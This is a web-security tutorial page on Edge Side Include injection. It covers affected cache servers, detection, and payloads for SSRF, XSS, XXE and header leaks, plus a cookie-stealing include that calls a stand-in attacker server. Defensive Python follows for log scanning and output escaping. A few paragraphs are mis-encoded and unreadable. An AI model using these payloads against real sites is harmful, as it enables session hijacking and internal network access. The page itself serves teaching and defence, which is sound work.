ESI(Edge Side Include) Injection


🔍 Introduction

ESIi stands for ESI (Edge Side Include) Injection: an injection attack against ESI markup in environments that use ESI.

ESI is short for Edge Side Include, a simple markup language used to define web page components for the dynamic assembly and delivery of web applications at the edge of the Internet. It is a standard set of tags for page assembly and is used in architectures such as web caches and load balancers (LB).

Within HTML, ESI appears as <esi:> tags, as shown below. Before the response body reaches the web browser, a cache server or similar component that can process ESI handles these tags and then passes the resulting data on.

<table>
<tr>
<td>test</td>
<td>
<esi:try>
  Invalid markup here
  <esi:attempt>
    <esi:include … >
    <!-- In the actual source this starts with <esi: like this, but -->
    <!-- the cache fills in the content for this part and passes it to the user. -->
    This line is valid and will be processed.
  </esi:attempt>
  Invalid markup here
  <esi:except>
  This HTML line is valid and will be processed.
  </esi:except>
  Invalid markup here
</esi:try>
</td>
</tr>
</table>

Affected

ESI is available in many applications, such as ATS and Squid. Many applications beyond the list below also support it.

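| Service | Include | Param | Headers |
|---|---|---|---|
| ATS (Apache Traffic Server) | O | O | O |
| Squid3 | O | O | O |
| Varnish Cache | O | N | N |
| Fastly | O | N | N |
| Akamai ESI Test Server | O | O | O |
| NodeJS - esi | O | O | O |
| NodeJS - nodesi | O | N | N |
| Oracle Web Cache | O | O | O |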

🗡 Offensive techniques

Detect

Use ESI syntax such as <esi:include … > to check whether ESI processing takes place before the data actually reaches the browser. A simple way to do this is to include an arbitrary page.

esii test
<esi:include src="https://www.hahwul.com/CNAME"/>

The body of the page at https://www.hahwul.com/CNAME contains only www.hahwul.com.

If the page that loads this code now shows www.hahwul.com in place of the ESI statement, a load balancer, cache, or similar component is processing ESI syntax.

esii test
www.hahwul.com

Exploitation

SSRF

Through include, an attacker can have a URL of their choosing included in the response page. This can be used for SSRF to reach internal systems, or to exfiltrate data out-of-band (OOB).

<esi:include src="https://internal_domain"/>
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>

Session Hijacking

In ESI, $(HTTP_COOKIE) reads cookie information, which can then be used to steal cookies. Because theft in this form is not subject to cookie security policies, cookies protected with HttpOnly and similar flags can also be retrieved.

<esi:vars>$(HTTP_COOKIE)</esi:vars>
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{JSESSIONID})</esi:vars>
<esi:vars>$(HTTP_COOKIE{Private_Cookie})</esi:vars>

As one example, the ESI statement below uses include to trigger a web request to the attacker's domain, reading the cookie value and sending it in the query string.

<esi:include src="https://attacker_server/?$(HTTP_COOKIE)"/>

The moment this ESI statement is processed and executed, a web request is sent to the attacker's server, and the cookie information can be captured from its web log.

Attacker server

127.0.0.1 "GET /?auth=56F21F5D19F9402B04610CF9108264BC266FBAF7... HTTP/1.1" 200

XSS

Because an ESI include inserts the target page directly into the response page, prepared XSS code can be loaded into the response page.

<esi:include src=https://attacker_server/xss.html/>

XXE

XXE is similar: include is used to fetch an XML file that contains the attack code.

<esi:include src="http://evilhost/poc.xml" dca="xslt" stylesheet="http://evilhost/poc.xsl" />

xslt file

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evilhost/file" >]>
<foo>&xxe;</foo>

Leak request body/header

ESI statements can also include the request body and headers. Through this, an attacker may steal passwords or other sensitive information in an authentication flow.

<esi:request_body>
<esi:request_header>

Information leak

์œ„์—์„œ COOKIE ์˜ˆ์‹œ๋ฅผ ๋“ค์—ˆ์ง€๋งŒ, ์ด์™ธ์—๋„ ๋‹ค๋ฅธ ์ •๋ณด๋„ ๊ฐ€์ ธ์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<esi:vars>$(HTTP_USER_AGENT)</esi:vars>
<esi:vars>$(QUERY_STRING)</esi:vars>

More

์ด์™ธ์—๋„ ESI ๋ฌธ๋ฒ•์„ ํ†ตํ•ด ์—ฌ๋Ÿฌ๊ฐ€์ง€ ํ˜•ํƒœ์˜ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ESI ๋ฌธ๋ฒ•์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ์•„๋ž˜ Oracle ๋ฌธ์„œ๋ฅผ ์ฐธ๊ณ ํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.

  • https://docs.oracle.com/cd/B14099_19/caching.1012/b14046/esi.htm

Bypass protection

This is similar to XSS. A service may use ESI but have logic that restricts certain special characters or attack strings. In that case, as with XSS, bypasses can be attempted through encoding and similar means. For details, see the Bypass protection section of the XSS page.
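From the defender's side, the encoding point above means request values must be decoded before they are matched. The following is an added example, not code from the original page: it repeatedly undoes URL and HTML-entity encoding and flags ESI tags and variables in access-log request targets. The log lines and the `example.invalid` host are constructed samples.

```python
import html
import re
from urllib.parse import unquote_plus

# ESI tag openers/closers and ESI variable references, e.g. <esi:include ...> or $(HTTP_COOKIE)
ESI_MARKERS = re.compile(
    r"<\s*/?\s*esi:[a-z_]+|\$\(\s*(?:HTTP_[A-Z_]+|QUERY_STRING)", re.IGNORECASE
)
# Request target inside a quoted request line of an access log
LOG_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value, max_rounds=5):
    """Undo nested URL and HTML-entity encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value

def find_esi_markers(value):
    """Return the ESI markers found in a request value after normalization."""
    return [m.group(0).lower() for m in ESI_MARKERS.finditer(normalize(value))]

def scan_access_log(lines):
    """Return (line_number, markers) for log lines whose request target carries ESI syntax."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.search(line)
        if m:
            markers = find_esi_markers(m.group(1))
            if markers:
                hits.append((n, markers))
    return hits

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '198.51.100.7 "GET /search?q=edge+cache HTTP/1.1" 200',
    '198.51.100.7 "GET /search?q=%3Cesi%3Ainclude%20src%3D%22http%3A%2F%2Fexample.invalid%2F%22%2F%3E HTTP/1.1" 200',
    '198.51.100.7 "GET /search?q=%253Cesi%253Avars%253E%2524(HTTP_COOKIE)%253C%252Fesi%253Avars%253E HTTP/1.1" 200',
    '198.51.100.7 "GET /search?q=%26lt%3BESI%3Ainclude HTTP/1.1" 200',
]

if __name__ == "__main__":
    for lineno, markers in scan_access_log(SAMPLE_LOG):
        print(lineno, markers)
```

Line 3 of the sample is double URL-encoded and line 4 mixes URL encoding with an HTML entity; a single decoding pass would miss both.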

🛡 Defensive techniques

Disable ESI

The simplest approach is to disable ESI if the service does not use it.

Escape ESIi

The countermeasure is similar to that for XSS. Restrict unnecessary special characters and data types so that they cannot be reflected into the page arbitrarily and trigger behavior. ESIi is also both a client-side attack against users and a server-side attack. Because it can create greater risk when combined with other vulnerabilities such as HTTP Request Smuggling, it should be checked as thoroughly as possible.
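One way to apply this at the origin, as an added example rather than code from the original page: encode user-controlled values before reflecting them, and audit outgoing bodies for ESI tags the application did not emit. The template, the `cdn.example.invalid` allowlist entry, and the function names are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import urlsplit

def escape_for_esi_page(value):
    """Encode a user-controlled value before reflecting it into a page an ESI processor parses."""
    escaped = html.escape(value, quote=True)  # < > & " ' become entities, so no <esi: tag survives
    # Assumption: the processor matches the literal "$(" and does not entity-decode first.
    return escaped.replace("$(", "&#36;(")

ESI_TAG = re.compile(r"<\s*esi:([a-z_]+)([^>]*)>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)

def audit_esi_tags(body, allowed_tags, allowed_hosts):
    """Return findings for ESI tags in an origin response that the application did not intend."""
    findings = []
    for tag in ESI_TAG.finditer(body):
        name = tag.group(1).lower()
        if name not in allowed_tags:
            findings.append(f"unexpected tag esi:{name}")
            continue
        src = SRC_ATTR.search(tag.group(2))
        if name == "include" and src:
            url = next(g for g in src.groups() if g is not None)
            host = urlsplit(url).hostname  # None for relative (same-origin) fragments
            if host is not None and host not in allowed_hosts:
                findings.append(f"include from unlisted host {host}")
    return findings

# Constructed origin template (hypothetical): one intended, same-origin include.
TEMPLATE = '<p>Hello {name}</p><esi:include src="/fragments/footer"/>'

def render(name, escape=True):
    """Render the template with the user-supplied name, escaped or raw."""
    return TEMPLATE.format(name=escape_for_esi_page(name) if escape else name)

if __name__ == "__main__":
    reflected = '<esi:include src=http://127.0.0.1/server-status/>'  # payload form shown on the page
    for escape in (False, True):
        findings = audit_esi_tags(render(reflected, escape), {"include"}, {"cdn.example.invalid"})
        print("escaped" if escape else "raw", findings)
```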

🕹 Tools

  • I'll make it later and add it 😎

📚 Articles

  • https://www.hahwul.com/2018/08/18/edge-side-include-injection-web-attack/

📌 References